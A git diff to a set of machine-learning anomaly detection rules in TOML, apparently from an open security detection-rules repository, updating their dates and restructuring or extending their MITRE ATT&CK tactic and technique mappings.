@@ -127,22 +127,30 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" @@ -153,10 +161,7 @@ id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml b/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml index 999853954af..fb80318ed02 100644 --- a/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml +++ b/rules/ml/credential_access_ml_windows_anomalous_metadata_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -115,19 +115,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml index af93615b61d..300b735984c 100644 --- a/rules/ml/execution_ml_windows_anomalous_script.toml +++ b/rules/ml/execution_ml_windows_anomalous_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -120,19 +120,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml b/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml index 0157a2de1c2..25ab0ac2b9e 100644 --- a/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml +++ b/rules/ml/initial_access_ml_auth_rare_source_ip_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -132,14 +132,26 @@ Machine learning models analyze login patterns to identify atypical IP addresses - Implement IP whitelisting or geofencing rules to restrict access from unexpected locations, enhancing future detection and prevention.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml index b4a53fb620b..d75624732fc 100644 --- a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml +++ b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -89,14 +89,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/ml/ml_high_count_events_for_a_host_name.toml b/rules/ml/ml_high_count_events_for_a_host_name.toml index 3af1d24172b..4baed3cf752 100644 --- a/rules/ml/ml_high_count_events_for_a_host_name.toml +++ b/rules/ml/ml_high_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -95,23 +95,23 @@ The detection of a spike in host-based traffic leverages machine learning to ide [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1498" 
@@ -123,28 +123,59 @@ id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/ml/ml_high_count_network_denies.toml b/rules/ml/ml_high_count_network_denies.toml index 39e7bd4d1f3..0cd21f75e73 100644 --- a/rules/ml/ml_high_count_network_denies.toml +++ b/rules/ml/ml_high_count_network_denies.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -114,62 +114,67 @@ Firewalls and ACLs are critical in controlling network traffic, blocking unautho [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] id = "T1590" name = "Gather Victim Network Information" reference = "https://attack.mitre.org/techniques/T1590/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" [rule.threat.tactic] -id = "TA0040" -name = 
"Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1498" @@ -181,3 +186,7 @@ id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/ml/ml_linux_anomalous_network_port_activity.toml b/rules/ml/ml_linux_anomalous_network_port_activity.toml index be92e900df7..c6d68ce99dd 100644 --- a/rules/ml/ml_linux_anomalous_network_port_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -121,11 +121,6 @@ In Linux environments, network ports facilitate communication between applicatio [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -136,9 +131,24 @@ id = "T1571" name = "Non-Standard Port" reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1205" +name = "Traffic Signaling" +reference = "https://attack.mitre.org/techniques/T1205/" + +[[rule.threat.technique.subtechnique]] +id = "T1205.001" +name = "Port Knocking" +reference = "https://attack.mitre.org/techniques/T1205/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" 
@@ -147,13 +157,12 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/ml_low_count_events_for_a_host_name.toml b/rules/ml/ml_low_count_events_for_a_host_name.toml index d2128f0bf36..1e9be8d7329 100644 --- a/rules/ml/ml_low_count_events_for_a_host_name.toml +++ b/rules/ml/ml_low_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -95,25 +95,30 @@ Host-based traffic monitoring is crucial for identifying anomalies in network ac [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" [[rule.threat.technique]] id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" 
diff --git a/rules/ml/ml_packetbeat_rare_server_domain.toml b/rules/ml/ml_packetbeat_rare_server_domain.toml index 21d0d1aac74..dd5fc5ab525 100644 --- a/rules/ml/ml_packetbeat_rare_server_domain.toml +++ b/rules/ml/ml_packetbeat_rare_server_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -121,11 +121,6 @@ Machine learning models analyze network traffic to identify atypical domain name [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" @@ -141,6 +136,11 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -152,11 +152,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" 
@@ -167,16 +162,30 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/ml_rare_destination_country.toml b/rules/ml/ml_rare_destination_country.toml index 7c1f674b243..300ac8b85d1 100644 --- a/rules/ml/ml_rare_destination_country.toml +++ b/rules/ml/ml_rare_destination_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -118,11 +118,6 @@ Machine learning models analyze network logs to identify traffic to uncommon des [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" @@ -138,6 +133,11 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" 
@@ -149,11 +149,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -164,14 +159,14 @@ id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" @@ -182,3 +177,30 @@ id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/ml_spike_in_traffic_to_a_country.toml b/rules/ml/ml_spike_in_traffic_to_a_country.toml index 9c9c130f549..97ff791d58d 100644 --- a/rules/ml/ml_spike_in_traffic_to_a_country.toml +++ b/rules/ml/ml_spike_in_traffic_to_a_country.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -118,52 +118,61 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = 
"https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_windows_anomalous_network_activity.toml b/rules/ml/ml_windows_anomalous_network_activity.toml index 3df432d3263..0f4ce5e16ba 100644 --- a/rules/ml/ml_windows_anomalous_network_activity.toml +++ b/rules/ml/ml_windows_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -92,19 +92,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" 
@@ -121,26 +126,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/persistence_ml_rare_process_by_host_windows.toml b/rules/ml/persistence_ml_rare_process_by_host_windows.toml index bea679b8ed2..9c3f5c00f2b 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_windows.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_windows.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -170,19 +170,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml index f498ba198b9..e075e166adc 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -173,14 +173,41 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/persistence_ml_windows_anomalous_service.toml b/rules/ml/persistence_ml_windows_anomalous_service.toml index de821662148..bf7341edc93 100644 --- a/rules/ml/persistence_ml_windows_anomalous_service.toml +++ b/rules/ml/persistence_ml_windows_anomalous_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -118,19 +118,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index c41b0d62e61..d02f2f59c77 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
